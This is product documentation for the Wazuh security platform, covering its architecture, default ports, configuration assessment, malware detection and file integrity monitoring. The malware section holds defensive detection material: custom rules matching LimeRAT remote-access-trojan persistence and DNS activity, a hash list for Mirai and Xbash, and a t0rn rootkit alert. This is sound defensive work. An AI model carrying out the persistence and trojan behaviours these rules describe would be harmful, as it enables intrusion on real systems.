Index

Getting started with Wazuh

Wazuh is a free and open source security platform that unifies XDR and SIEM capabilities. It protects workloads across on-premises, virtualized, containerized, and cloud-based environments.

Wazuh helps organizations and individuals to protect their data assets against security threats. It is widely used by thousands of organizations worldwide, from small businesses to large enterprises.

Check this Getting Started for an overview of the Wazuh platform components, architecture, and common use cases.

Community and support

Wazuh has one of the largest open source security communities in the world. You can become part of it to learn from other users, participate in discussions, talk to our development team, and contribute to the project. The following resources are easily available:

  • Slack channel: Join our community channel to chat with our developers and technical team in a close to real-time experience.

  • Google group: Here you can share questions and learn from other Wazuh users. It is easy to subscribe via email.

  • GitHub repositories: Get access to the Wazuh source code, report issues, and contribute to the project. We happily review and accept pull requests.

  • Discord: Engage with our community in dynamic discussions and collaborations on the latest security trends and Wazuh developments.

  • Reddit: Join our subreddit to share insights, ask questions, and discuss security issues with fellow users.

  • X: Follow us on X for real-time updates, news, and quick tips from our development team and security experts.

  • LinkedIn: Stay updated with our professional network and industry news by connecting with us on LinkedIn.

  • YouTube: Subscribe to our YouTube channel for video tutorials, webinars, and walkthroughs of Wazuh features and configurations.

In addition, we also provide professional support, training, and consulting services.

How to install Wazuh

The Wazuh solution is composed of three central platform components and a single universal agent. For installing Wazuh in your infrastructure, you can check the following sections of our documentation:

  • The Quickstart is an automated way of installing Wazuh in just a few minutes.

  • The Installation guide provides instructions on how to install each central component and how to deploy the Wazuh agents.

Wazuh Cloud

The Wazuh Cloud is our software as a service (SaaS) solution. We provide a 14-day free trial for you to create a cloud environment and get the best out of our SaaS solution. Check the Cloud service documentation for more information.

Screenshots

Threat Hunting
Malware detection
File Integrity Monitoring
Vulnerability Detection
Mitre Att&ck
Security configuration assessment
Summary
Amazon Web Services
GitHub
PCI DSS

Components

The Wazuh platform provides XDR and SIEM features to protect your cloud, container, and server workloads. These include log data analysis, intrusion and malware detection, file integrity monitoring, configuration assessment, vulnerability detection, and support for regulatory compliance.

The Wazuh solution is based on the Wazuh agent, which is deployed on the monitored endpoints, and on three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard.

  • The Wazuh indexer is a highly scalable, full-text search and analytics engine. This central component indexes and stores alerts generated by the Wazuh server.

  • The Wazuh server analyzes data received from the agents. It processes it through decoders and rules, using threat intelligence to look for well-known indicators of compromise (IOCs). A single server can analyze data from hundreds or thousands of agents, and scale horizontally when set up as a cluster. This central component is also used to manage the agents, configuring and upgrading them remotely when necessary.

  • The Wazuh dashboard is the web user interface for data visualization and analysis. It includes out-of-the-box dashboards for threat hunting, regulatory compliance (e.g., PCI DSS, GDPR, CIS, HIPAA, NIST 800-53), detected vulnerable applications, file integrity monitoring data, configuration assessment results, cloud infrastructure monitoring events, and others. It is also used to manage Wazuh configuration and to monitor its status.

  • Wazuh agents are installed on endpoints such as laptops, desktops, servers, cloud instances, or virtual machines. They provide threat prevention, detection, and response capabilities. They run on operating systems such as Linux, Windows, and macOS.

In addition to agent-based monitoring capabilities, the Wazuh platform can monitor agent-less devices such as firewalls, switches, routers, or network IDS, among others. For example, a system log data can be collected via Syslog, and its configuration can be monitored through periodic probing of its data, via SSH or through an API.

The diagram below represents the Wazuh components and data flow.

Wazuh components and data flow
Wazuh indexer

The Wazuh indexer is a highly scalable, full-text search and analytics engine. This Wazuh central component indexes and stores alerts generated by the Wazuh server and provides near real-time data search and analytics capabilities. The Wazuh indexer can be configured as a single-node or multi-node cluster, providing scalability and high availability.

The Wazuh indexer stores data as JSON documents. Each document correlates a set of keys, field names, or properties with their corresponding values, which can be strings, numbers, Boolean values, dates, arrays of values, geolocations, or other types of data.

An index is a collection of related documents. The documents stored in the Wazuh indexer are distributed across different containers known as shards. By distributing the documents across multiple shards and distributing those shards across various nodes, the Wazuh indexer can ensure redundancy. This protects your system against hardware failures and increases query capacity as nodes are added to a cluster.

We show an image of the Wazuh indexer cluster below:

Wazuh indexer

Wazuh uses several types of indices to store different event types. For details, see the Wazuh indexer indices section of the documentation.

The Wazuh indexer is well-suited for time-sensitive use cases like security analytics and infrastructure monitoring, as it is a near real-time search platform. The latency from the time a document is indexed until it becomes searchable is very short, typically one second.

In addition to its speed, scalability, and resiliency, the Wazuh indexer has several built-in features that make storing and searching data even more efficient, such as data roll-ups, alerting, anomaly detection, and index lifecycle management.

Visit the installation guide and user manual for more information about the Wazuh indexer.

Wazuh server

The Wazuh server is the central component responsible for analyzing data collected from Wazuh agents and agentless devices. It detects threats, anomalies, and regulatory compliance violations in real time, generating alerts when suspicious activity is identified. Beyond detection, the Wazuh server enables centralized management by remotely configuring Wazuh agents and continuously monitoring their operational status.

The Wazuh server leverages multiple threat intelligence sources and enriches alerts with contextual data to enhance detection accuracy. This includes mapping events to the MITRE ATT&CK framework, detecting vulnerabilities with the Wazuh CTI service, and aligning findings with regulatory standards such as PCI DSS, GDPR, HIPAA, CIS benchmarks, and NIST 800-53. These capabilities provide security teams with actionable insights for threat hunting, vulnerability detection, and regulatory compliance monitoring.

The Wazuh server integrates with external platforms to support streamlined workflows. Examples include ticketing systems such as ServiceNow, Jira, and PagerDuty, as well as communication tools like Slack. These integrations help automate incident tracking, accelerate response times, and improve collaboration within security operations teams.

Server architecture

The Wazuh server includes the Analysis engine, Wazuh server API, agent enrollment service, agent connection service, cluster daemon, and Filebeat. It runs on Linux across physical endpoints, virtual machines, containers, or cloud instances. On Windows endpoints, deploy using Wazuh Docker.

The diagram below shows the Wazuh server architecture and components.

Wazuh server architecture
Server components

The Wazuh server comprises several components listed below that have different functions, such as enrolling new agents, validating each agent's identity, and encrypting the communications between the Wazuh agent and the Wazuh server.

  • Agent enrollment service: Registers new Wazuh agents and generates and distributes unique authentication keys to each agent. It runs as a network service and supports TLS and SSL certificate–based authentication, or enrollment using a fixed password.

  • Agent connection service: Manages communication between Wazuh agents and the Wazuh server. It validates Wazuh agent identities using enrollment keys, enforces encryption for secure data transfer, and enables centralized configuration management to push updated agent settings remotely.

  • Analysis engine: At the core of Wazuh threat detection capabilities, the Analysis engine processes received security data using decoders and rules:

    • Decoders classify log types (for example, Windows events, SSH logs, web server logs) and extract relevant fields such as IP addresses, usernames, and event IDs.

    • Rules match decoded events against known patterns to detect threats and anomalies. When triggered, rules generate alerts and invoke incident response actions such as blocking IP addresses, terminating malicious processes, or removing malware artifacts.

  • Wazuh server API: Provides a programmatic interface for interacting with the Wazuh server. It allows administrators using the Wazuh dashboard or command line to perform the following, but not limited to:

    • Configure and manage agents or servers

    • Monitor system health and infrastructure status

    • Query alerts and endpoint data

    • Create or update decoders and rules

To learn more, visit the Wazuh server API documentation.

  • Wazuh cluster daemon: Enables horizontal scaling by linking multiple Wazuh servers into a cluster. Using a load balancer provides high availability, fault tolerance, and load distribution.

  • Filebeat: Forwards events and alerts from the Wazuh analysis engine to the Wazuh indexer.

Visit the installation guide and user manual for more information about the Wazuh server.

Wazuh dashboard

The Wazuh dashboard is a flexible and intuitive web interface for visualizing, analyzing, and managing security data. It enables users to investigate events and alerts, oversee the Wazuh platform, and enforce role-based access control (RBAC) and single sign-on (SSO) policies.

Data visualization and analysis

The Wazuh dashboard lets users navigate security data collected from Wazuh agent and agentless devices, and alerts generated by the Wazuh server. It includes dashboards for threat hunting, malware detection, file integrity monitoring, system inventory, and regulatory compliance (for example, PCI DSS, GDPR, HIPAA, and NIST 800-53). You can generate reports and create custom visualizations and dashboards.

Data visualization
Agents monitoring and configuration

The Wazuh dashboard allows users to manage agent configuration and monitor agent status. For each monitored endpoint, users can define which agent modules are enabled, which log files are read, which files are monitored for integrity changes, and which configuration checks are performed.

Agents monitoring
Platform management

The Wazuh dashboard provides a user interface to manage a Wazuh deployment. This includes monitoring the status, logs, and statistics of Wazuh components, configuring the Wazuh server, and creating custom rules and decoders for log analysis and threat detection.

Platform management
Developer tools

The Wazuh dashboard includes a ruleset test tool that processes log messages to show how they are decoded and whether they match a detection rule. This is useful when testing custom decoders and rules.

Ruleset test

The Wazuh dashboard also includes API consoles for interacting with the Wazuh server and the Wazuh indexer API. They are used to manage the Wazuh server capabilities or interact with Wazuh indexer indices.

Wazuh server API

Wazuh server API console

Wazuh indexer API

Wazuh indexer API console
Wazuh agent

The Wazuh agent runs on Linux, Windows, and macOS operating systems. It can be deployed to laptops, desktops, servers, cloud instances, containers, or virtual machines. The Wazuh agent helps to protect your system by providing threat prevention, detection, and response capabilities. It is also used to collect different types of system and application data that it forwards to the Wazuh server through an encrypted and authenticated channel.

Agent architecture

The Wazuh agent has a modular architecture. Each module is in charge of its own tasks, including monitoring the file system, reading log files, collecting inventory data, scanning the system configuration, and looking for malware. Users can manage agent modules through configuration settings, adapting the solution to their specific use cases.

The diagram below shows the agent architecture and modules.

Agent architecture
Wazuh agent modules

All agent modules are configurable and perform different security tasks. This modular architecture allows you to configure each module according to your security needs. The following list summarizes the purposes of the Wazuh agent modules.

  • Log collector: Reads flat log files and Windows events, collecting operating system and application log messages. It supports XPath filters for Windows events and recognizes multi-line formats like Linux Audit logs. It can also enrich JSON events with additional metadata.

  • Command execution: Runs authorized commands periodically, collecting their output and reporting it back to the Wazuh server for further analysis. You can use this module for different purposes, such as monitoring available disk space or getting a list of recently logged-in users.

  • File integrity monitoring (FIM): Monitors the file system, reporting when files are created, deleted, or modified. It keeps track of changes in file attributes, permissions, ownership, and content. When an event occurs, it captures who, what, and when details in real time.

  • Security configuration assessment (SCA): Provides continuous configuration assessment, utilizing out-of-the-box checks based on the Center of Internet Security (CIS) benchmarks. Users can also create their own SCA checks to monitor and enforce their security policies.

  • System inventory: Periodically runs scans to collect inventory data such as operating system version, network interfaces, running processes, installed applications, and a list of open ports. Scan results are stored in local SQLite databases that can be queried remotely.

  • Malware detection: Uses a non-signature-based approach to detect anomalies and the possible presence of rootkits. It also looks for hidden processes, hidden files, and hidden ports while monitoring system calls.

  • Active Response: Runs automatic actions when threats are detected, triggering responses to block a network connection, stop a running process, or delete a malicious file. Users can also create custom responses when required, for example, responses for running a binary in a sandbox, capturing network traffic, and scanning a file with an antivirus.

  • Container security monitoring: Integrates with the Docker Engine API to monitor changes in a containerized environment. For example, it detects changes to container images, network configuration, or data volumes. It alerts about containers running in privileged mode and about users executing commands in a running container.

  • Cloud security monitoring: Monitors cloud providers such as Amazon Web Services, Microsoft Azure, or Google GCP, communicating natively with their APIs. It detects changes to the cloud infrastructure, for example, when a new user is created, a security group is modified, or a cloud instance is stopped. Additionally, it collects cloud services log data such as AWS CloudTrail, GCP Pub/Sub, and Azure Active Directory.

Communication with Wazuh server

The Wazuh agent communicates with the Wazuh server to ship collected data and security-related events. The Wazuh agent also sends operational data, reporting its configuration and status. Once connected, the agent can be upgraded, monitored, and configured remotely from the Wazuh server.

The communication between the Wazuh agent and the Wazuh server takes place through a secure channel (TCP or UDP), providing data encryption and compression in real time. Additionally, it includes flow control mechanisms to avoid flooding, queueing events when necessary, and protecting the network bandwidth.

You need to enroll the Wazuh agent before connecting it to the Wazuh server for the first time. This process provides the agent with a unique key used for authentication and data encryption.

Architecture

The Wazuh architecture is composed of a multi-platform Wazuh agent and three central components: the Wazuh server, Wazuh indexer, and Wazuh dashboard. The agent is deployed on endpoints to collect and forward security data to the Wazuh server for analysis. The analyzed data is then forwarded to the Wazuh indexer for indexing and storage, and subsequently to the Wazuh dashboard for alerting and visualization.

Wazuh also supports agentless monitoring for systems and devices where installing the Wazuh agent is not possible. Network devices such as firewalls, switches, routers, and access points can actively forward log data via Syslog and SSH.

The Wazuh central components can be deployed in different ways, depending on scalability and availability needs:

  • All-in-one deployment: All Wazuh components (server, indexer, and dashboard) are installed on a single server. Best suited for labs and small environments with a limited number of monitored endpoints.

  • Single-node deployment: The Wazuh server, indexer, and dashboard are each deployed on separate servers. Recommended for medium environments that require higher performance than an all-in-one setup.

  • Multi-node deployment: Typically, one instance of the Wazuh dashboard and multiple instances of the Wazuh server (Wazuh server cluster) and indexer (Wazuh indexer cluster) are deployed on their individual servers, respectively. The number of instances varies depending on your needs. This deployment is recommended for large environments with high event throughput, or when fault tolerance and high availability are required.

Visit the installation guide and installation alternatives documentation to learn about the different ways to deploy Wazuh.

The diagram below represents a Wazuh deployment architecture. It shows how the Wazuh server and the Wazuh indexer nodes can be configured as clusters, providing load balancing and high availability.

Deployment architecture
Component communication
Wazuh agent - Wazuh server

The Wazuh agent continuously sends events to the Wazuh server for analysis and threat detection. To start shipping this data, the agent establishes a connection with the Wazuh server service for agent connection, which listens on TCP port 1514 by default (this is configurable). The Wazuh server then decodes and matches rules against the received events, utilizing the Wazuh Analysis engine.

The Wazuh messages protocol uses AES encryption with 128 bits per block and 256-bit keys.

Note

Read the Benefits of using AES in the Wazuh communications document for more information.

Wazuh server - Wazuh indexer

The Wazuh server uses Filebeat to send alert and event data to the Wazuh indexer, using TLS encryption. Filebeat reads the Wazuh server output data and sends it to the Wazuh indexer (by default listening on port 9200/TCP). Once the data is indexed by the Wazuh indexer, the Wazuh dashboard is used to query and visualize the security information.

Wazuh dashboard - Wazuh dashboard/Wazuh indexer

The Wazuh dashboard queries the Wazuh server API (by default listening on port 55000/TCP on the Wazuh server) to display configuration and status-related information of the Wazuh server and agents. This communication is encrypted with TLS and authenticated with a username and password.

The Wazuh dashboard visualizes and queries the information indexed on the Wazuh indexer.

Required ports

Wazuh components communicate using several services. The list of default ports used by these services is shown below. Users can modify these port numbers when necessary.

Component

Port

Protocol

Purpose

Wazuh server

1514

TCP

Agent connection service

1515

TCP

Agent enrollment service

1516

TCP

Wazuh cluster daemon

514

UDP (default)

Wazuh Syslog collector (disabled by default)

514

TCP (optional)

Wazuh Syslog collector (disabled by default)

55000

TCP

Wazuh server RESTful API

Wazuh indexer

9200

TCP

Wazuh indexer RESTful API

9300-9400

TCP

Wazuh indexer cluster communication

Wazuh dashboard

443

TCP

Wazuh web user interface

Wazuh CTI

The Wazuh Cyber Threat Intelligence (CTI) service is a publicly accessible platform that collects, analyzes, and disseminates actionable information on emerging cyber threats and vulnerabilities. This service currently focuses on vulnerability intelligence, delivering timely updates on Common Vulnerabilities and Exposures (CVEs), severity scores, exploitability insights, and mitigation strategies. It aggregates and sanitizes data from trusted sources, including operating system vendors and major vulnerability databases, to ensure high-quality, relevant intelligence.

This service is integrated directly with the Wazuh Vulnerability Detection module, but is also publicly available at the Wazuh CTI website.

Use cases

The Wazuh platform helps organizations and individuals protect their data assets through threat prevention, detection, and response. Besides, Wazuh is also employed to meet regulatory compliance requirements, such as PCI DSS or HIPAA, and configuration standards like CIS hardening guides.

Moreover, Wazuh is also a solution for users of IaaS (Amazon AWS, Azure, or Google Cloud) to monitor virtual machines and cloud instances. This is done at a system level utilizing the Wazuh security agent and at an infrastructure level pulling data directly from the cloud provider API.

Additionally, Wazuh is employed to protect containerized environments by providing cloud-native runtime security. This feature is based on an integration with the Docker engine API and the Kubernetes API. The Wazuh security agent can run on the Docker host providing a complete set of threat detection and response capabilities.

Below you can find examples of some of the most common use cases of the Wazuh platform.

Endpoint security

Threat intelligence

Security operations

Cloud security

Configuration assessment

Threat hunting

Incident response

Container security

Malware detection

Log data analysis

Regulatory compliance

Posture management

File integrity monitoring

Vulnerability detection

IT hygiene

Workload protection

Configuration assessment

Configuration assessment is a process that verifies whether endpoints adhere to a set of predefined rules regarding configuration settings and approved application usage. It involves comparing the current configuration against established industry standards and organizational policies to identify vulnerabilities and misconfigurations.

Regular configuration assessments are essential in maintaining a secure and compliant environment, as they help organizations proactively identify and patch vulnerabilities. This practice strengthens security controls and minimizes the risk of security incidents.

Wazuh SCA module

Wazuh offers a Security Configuration Assessment (SCA) module that assists security teams to scan and detect misconfigurations within their environment. The Wazuh agent uses policy files to scan endpoints that it monitors. These files contain predefined checks to be carried out on each monitored endpoint.

Wazuh includes SCA policies out-of-the-box based on the Center for Internet Security (CIS) security benchmarks. These benchmarks serve as essential guidelines on best practices for protecting IT systems and data from cyberattacks. They provide clear instructions for establishing a secure baseline configuration and offer guidance to ensure that users implement effective measures to safeguard their critical assets and mitigate potential vulnerabilities. By adhering to these standards, you can enhance your overall security posture and mitigate the risk of cyber threats against your business.

Some other benefits of the Wazuh Security Configuration Assessment (SCA) module include:

  • Security posture management: Wazuh SCA helps organizations ensure that their endpoints are configured securely. This minimizes vulnerabilities resulting from misconfigurations and reduces the risk of security breaches.

  • Compliance monitoring: It allows organizations to assess and implement compliance with regulatory standards, best practices, and internal security policies.

  • Continuous monitoring: Wazuh SCA continuously monitors the configuration of the endpoints and alerts when it discovers misconfigurations.

Overview of Wazuh SCA policies

The Wazuh SCA module uses policies written in YAML format. Each policy consists of checks, and each check comprises one or more rules. These rules can examine various aspects of an endpoint, such as the presence of files, directories, Windows registry keys, running processes, and more.

By default, the Wazuh agent runs scans for every policy (.yaml or .yml files) present in the ruleset directory. This directory can be found in the following locations on every operating system that runs the Wazuh agent:

  • Linux and Unix-based agents: /var/ossec/ruleset/sca.

  • Windows agents: C:\Program Files (x86)\ossec-agent\ruleset\sca.

  • macOS agents: /Library/Ossec/ruleset/sca.

Wazuh also allows you to create custom policies that can be used to scan endpoints and verify if they conform to your organization’s policies.

See a snippet of a CIS policy file /var/ossec/ruleset/sca/cis_ubuntu22-04.yml which is included out-of-the-box on Ubuntu 22.04 endpoints. The SCA policy which is based on the CIS benchmarks, runs checks on the endpoint to determine if it conforms to the best practices for system hardening. The SCA policy with ID 28500 checks if the /tmp directory is on a separate partition.

- id: 28500
  title: "Ensure /tmp is a separate partition."
  description: "The /tmp directory is a world-writable directory used for temporary storage by all users and some applications."
  rationale: "Making /tmp its own file system allows an administrator to set additional mount options such as the noexec option on the mount, making /tmp useless for an attacker to install executable code. It would also prevent an attacker from establishing a hard link to a system setuid program and wait for it to be updated. Once the program was updated, the hard link would be broken and the attacker would have his own copy of the program. If the program happened to have a security vulnerability, the attacker could continue to exploit the known flaw. This can be accomplished by either mounting tmpfs to /tmp, or creating a separate partition for /tmp."
  impact: "Since the /tmp directory is intended to be world-writable, there is a risk of resource exhaustion if it is not bound to a separate partition. Running out of /tmp space is a problem regardless of what kind of filesystem lies under it, but in a configuration where /tmp is not a separate file system it will essentially have the whole disk available, as the default installation only creates a single / partition. On the other hand, a RAM-based /tmp (as with tmpfs) will almost certainly be much smaller, which can lead to applications filling up the filesystem much more easily. Another alternative is to create a dedicated partition for /tmp from a separate volume or disk. One of the downsides of a disk-based dedicated partition is that it will be slower than tmpfs which is RAM-based. /tmp utilizing tmpfs can be resized using the size={size} parameter in the relevant entry in /etc/fstab."
  remediation: "First ensure that systemd is correctly configured to ensure that /tmp will be mounted at boot time. # systemctl unmask tmp.mount For specific configuration requirements of the /tmp mount for your environment, modify /etc/fstab or tmp.mount. Example of /etc/fstab configured tmpfs file system with specific mount options: tmpfs 0 /tmp tmpfs defaults,rw,nosuid,nodev,noexec,relatime,size=2G 0 Example of tmp.mount configured tmpfs file system with specific mount options: [Unit] Description=Temporary Directory /tmp ConditionPathIsSymbolicLink=!/tmp DefaultDependencies=no Conflicts=umount.target Before=local-fs.target umount.target After=swap.target [Mount] What=tmpfs Where=/tmp Type=tmpfs."
  references:
    - https://www.freedesktop.org/wiki/Software/systemd/APIFileSystems/
    - https://www.freedesktop.org/software/systemd/man/systemd-fstab-generator.html
  compliance:
    - cis: ["1.1.2.1"]
    - cis_csc_v7: ["14.6"]
    - cis_csc_v8: ["3.3"]
    - mitre_techniques: ["T1499", "T1499.001"]
    - mitre_tactics: ["TA0005"]
    - mitre_mitigations: ["M1022"]
    - cmmc_v2.0: ["AC.L1-3.1.1", "AC.L1-3.1.2", "AC.L2-3.1.5", "AC.L2-3.1.3", "MP.L2-3.8.2"]
    - hipaa: ["164.308(a)(3)(i)", "164.308(a)(3)(ii)(A)", "164.312(a)(1)"]
    - pci_dss_v3.2.1: ["7.1", "7.1.1", "7.1.2", "7.1.3"]
    - pci_dss_v4.0: ["1.3.1", "7.1"]
    - nist_sp_800-53: ["AC-5", "AC-6"]
    - soc_2: ["CC5.2", "CC6.1"]
  condition: all
  rules:
    - 'c:findmnt --kernel /tmp -> r:\s*/tmp\s'
    - "c:systemctl is-enabled tmp.mount -> r:generated|enabled"

The /tmp directory is used to store data that is needed for a short time by system and user applications. Mounting /tmp on a separate partition allows an administrator to set additional mount options such as the noexec, nodev, and nosuid. Therefore making the directory useless for an attacker to install executable code. The SCA policy file also gives recommendations on how to remediate this issue.

Viewing SCA results

The Wazuh dashboard has a Configuration Assessment module that allows you to view SCA scan results for each agent.

Configuration Assessment module
Interpreting SCA results

The image below shows the policy based on the CIS benchmark for Ubuntu Linux 22.04 LTS. You can see that 191 checks were run against the Ubuntu 22.04 endpoint. Out of these, 56 passed, 87 failed, and 48 are not applicable to the endpoint. It also shows a score of 39% which is calculated based on the number of tests passed.

Policy for CIS benchmark for Ubuntu 22.04 checks

You can click on the checks to get more information. In the image below, you can see information such as rationale, remediation, and a description of the check with ID 3003.

Results for CIS benchmark for Ubuntu 22.04 check ID 3003

The above SCA scan result shows failed because the public key authentication for ssh is not enabled. If the remediation is implemented, the result will change to passed thereby improving the security of the endpoint.

Implementing SCA remediation steps

In the example in the previous section, implementing the remediation provided by the Wazuh SCA improves the security of the endpoint. This involves changing the PubkeyAuthentication option value in the sshd_config file. In the image below, you can see the status of the check 3003 has changed to passed.

Status passed for the check 3003

By utilizing the Wazuh SCA module, you can detect misconfigurations, remediate them, and verify that your endpoints adhere to industry best practices. This proactive approach significantly reduces the likelihood of security breaches within your environment.

Malware detection

Malware, short for malicious software, refers to any software specifically designed to harm or exploit computer systems, networks, or users. It is created with the intention of gaining unauthorized access, causing damage, stealing sensitive information, or performing other malicious activities on a target system. There are various types of malware, each with specific functions and infection methods. Some common types of malware include viruses, worms, ransomware, botnets, spyware, trojans, and rootkits.

Malware detection is crucial for safeguarding computer systems and networks from cyber threats. It helps identify and mitigate malicious software that can cause a data breach, system compromise, and financial loss.

Wazuh for malware detection

Traditional methods, which rely solely on signature-based detections, have limitations and fail to capture new threats. Signature-based approaches struggle with detecting zero-day attacks, polymorphic malware, and other evasion techniques employed by threat actors. As a result, organizations are at risk of undetected breaches and data exfiltration. Wazuh empowers organizations to detect and respond to sophisticated and evasive threats effectively. Wazuh encompasses different modules that identify malware properties, activities, network connections, and more.

Detecting malicious activities with threat detection rules

Wazuh has threat detection rules that enable behavior-based malware detection. Instead of relying solely on predefined signatures, Wazuh focuses on monitoring and analyzing abnormal behavior exhibited by malware. This allows Wazuh to detect known and previously unknown threats. This way, Wazuh provides a proactive and adaptable defense against cyber threats. Wazuh has out-of-the-box rulesets that are specifically designed to trigger alerts for recognized malware patterns, providing a quick response to potential security incidents. For example, the image below shows an alert with rule ID 92213 triggered when an executable is dropped in a folder commonly used by malware. This alert prompts security teams to begin the investigation and remediation process.

Executable dropped in folder used by malware alert

Wazuh allows users to create custom rules for more flexibility in detection, empowering them to focus on relevant activities, and optimizing malware detection. Wazuh decodes and organizes logs from monitored endpoints into fields, which can then be utilized to create custom rules for alerting when malicious activity is detected.

Wazuh rules use multiple fields that denote indicators of compromise (IOCs) to reduce false positives and detect known malware based on specific behaviors. These rules can connect related malware activities, such as intrusion, privilege escalation, lateral movement, obfuscation, and exfiltration for comprehensive detection.

Below is an example of some Wazuh custom rules created to alert on malicious activities of the LimeRAT malware:

<group name="lime_rat,sysmon,">

  <!-- Rogue create netflix.exe creation -->
  <rule id="100024" level="12">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.image" type="pcre2">\.exe</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)[c-z]:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\checker netflix\.exe</field>
    <description>Potential LimeRAT activity detected: checker netflix.exe created at $(win.eventdata.targetFilename) by $(win.eventdata.image).</description>
    <mitre>
      <id>T1036</id>
    </mitre>
  </rule>

  <!-- Registry key creation for persistence -->
  <rule id="100025" level="12">
    <if_group>sysmon</if_group>
    <field name="win.eventdata.details" type="pcre2">(?i)[c-z]:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\checker netflix\.exe</field>
    <field name="win.eventdata.targetObject" type="pcre2" >HKU\\\\.+\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\checker netflix\.exe</field>
    <field name="win.eventdata.eventType" type="pcre2" >^SetValue$</field>
    <description>Potential LimeRAT activity detected:  $(win.eventdata.details) added itself to the Registry as a startup program $(win.eventdata.targetObject) to establish persistence.</description>
    <mitre>
      <id>T1547.001</id>
    </mitre>
  </rule>

  <!-- Network activity detection -->
  <rule id="100026" level="12">
    <if_sid>61605</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)[c-z]:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\checker netflix\.exe</field>
    <description>Potential LimeRAT activity detected: Suspicious DNS query made by $(win.eventdata.image).</description>
    <mitre>
      <id>T1572</id>
    </mitre>
  </rule>


  <!-- LimeRAT service creation -->
  <rule id="100028" level="12">
    <if_sid>61614</if_sid>
    <field name="win.eventdata.targetObject" type="pcre2" >HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\disk</field>
    <field name="win.eventdata.eventType" type="pcre2" >^CreateKey$</field>
    <description>Potential LimeRAT activity detected: LimeRAT service $(win.eventdata.targetObject) has been created on $(win.system.computer).</description>
      <mitre>
    <id>T1543.003</id>
      </mitre>
  </rule>

</group>

These rules create alerts that are visible in the Threat Hunting module on the Wazuh dashboard.

LimeRAT custom alerts example

Refer to the blog post on LimeRat detection and response with Wazuh for the full configuration.

Wazuh identifies behavior indicative of malware, it generates real-time alerts and notifications, enabling security teams to respond swiftly and mitigate potential risks before they escalate.

Leveraging file integrity monitoring for detecting malware activity

File Integrity Monitoring (FIM) is a valuable component in malware detection. Wazuh provides FIM capabilities to monitor and detect changes to files and directories on monitored endpoints. These changes include creation, modification, or deletion. While FIM provides essential insights, combining it with other capabilities and integrations further enhances its effectiveness for malware detection. Wazuh allows security teams to create custom rules based on FIM events, enabling targeted malware detection. These customizable rules correlate FIM events with specific indicators of compromises such as suspicious file extensions, code snippets, or known malware signatures.

The image below shows an alert when a web shell creates or modifies a file on a web server.

Web shell FIM alert

Malware frequently targets Windows Registry to achieve malicious objectives, such as establishing persistence and performing other malicious actions. The Wazuh File Integrity Monitoring (FIM) module includes Windows Registry monitoring that monitors commonly targeted registry paths to detect modifications. When changes occur, the FIM module triggers real-time alerts, empowering security teams to swiftly identify and respond to suspicious registry key manipulation.

The images below display the Wazuh FIM module dashboard and events of Windows Registry modifications.

Windows registry modifications in FIM module dashboard
FIM module  with Windows registry modifications events
Enhancing malware detection with threat intelligence integration

Users can boost their malware detection capabilities by integrating with threat intelligence sources. These intelligence feeds enrich the Wazuh knowledge base with additional up-to-date information on known malicious IP addresses, domains, URLs, and other indicators of compromise. Examples of threat intelligence sources Wazuh can integrate with include VirusTotal, MISP, and more.

VirusTotal integration example alert

Wazuh proactively identifies malicious files by comparing the identified IOCs with the information stored in the CDB lists (constant databases). These lists can store known malware indicators of compromise (IOCs) including file hashes, IP addresses, and domain names.

You can customize entries in either key:value or key: format for tailored detection, an example of such is seen below. A CBD list containing known MD5 malware hashes of the Mirai and Xbash malware is used for detection:

e0ec2cd43f71c80d42cd7b0f17802c73:mirai
55142f1d393c5ba7405239f232a6c059:Xbash

Upon detection, these alerts are observed within the Threat Hunting module of the Wazuh dashboard, as seen below.

Alert of file with known malware hash

Refer to the Use case: Detecting malware using file hashes in a CDB list for full configurations.

Unveiling stealthy threats with rootkit detection

Rootkits are malicious software designed to conceal the presence of malware on an endpoint by manipulating operating system functions such as altering system calls or modifying kernel data structures. Wazuh has a Rootcheck module that periodically scans the monitored endpoint to detect rootkits both at the kernel and the user space level. The rootcheck identifies and alerts potential rootkit activity. By analyzing system behavior and comparing it to known rootkit patterns, Wazuh promptly detects rootkit-related patterns and raises alerts for further investigation.

Below, we show an example of an alert generated by the Wazuh Rootcheck module when it detects an anomaly in the filesystem:

** Alert 1668497750.1838326: - ossec,rootcheck,pci_dss_10.6.1,gdpr_IV_35.7.d,
2022 Nov 15 09:35:50 (Ubuntu) any->rootcheck
Rule: 510 (level 7) -> 'Host-based anomaly detection event (rootcheck).'
Rootkit 't0rn' detected by the presence of file '/usr/bin/.t0rn'.
title: Rootkit 't0rn' detected by the presence of file '/usr/bin/.t0rn'.

While Wazuh continues to enhance its rootkit behavior detection capabilities, the Command monitoring module can also be configured to monitor command-line activities across endpoints, enabling the detection of malicious commands and malware activities. This module provides organizations with a comprehensive approach to uncovering hidden threats and safeguarding their systems effectively.

Monitoring system calls for malware and anomaly detection

Wazuh monitors system calls on Linux endpoints to bolster malware detection and aid in anomaly detection. Wazuh utilizes the Linux Audit system to monitor system calls.

System call monitoring in combination with Wazuh File Integrity Monitoring (FIM) and threat intelligence integration enhances malware detection. It captures security-relevant events like file access, command execution, and privilege escalation, providing real-time insights into potential security incidents. This comprehensive approach strengthens organizations' cybersecurity resilience. In the image below, you can visualize the alerts for privilege abuse on the Wazuh dashboard for Ubuntu Linux 22.04.

Privilege abuse alerts

Wazuh empowers security teams to leverage the audit rules provided by Auditd. Creating custom rules based on system call events enhances malware detection efforts and strengthens overall cybersecurity resilience.

File integrity monitoring

File Integrity Monitoring (FIM) involves monitoring the integrity of files and directories to detect and alert when there are file addition, modification, or deletion events. FIM provides an important layer of protection for sensitive files and data by routinely scanning and verifying the integrity of those assets. It identifies file changes that could be indicative of a cyberattack and generates alerts for further investigation and remediation if necessary.

The Wazuh open source File Integrity Monitoring module tracks the activities performed within monitored directories or files to gain extensive information on file creation, modification, and deletion. When a file is changed, Wazuh compares its checksum against a pre-computed baseline and triggers an alert if it finds a mismatch.

The open source FIM module performs real-time monitoring and scheduled scans depending on the level of sensitivity of the monitored files.

Viewing File Integrity Monitoring scan results

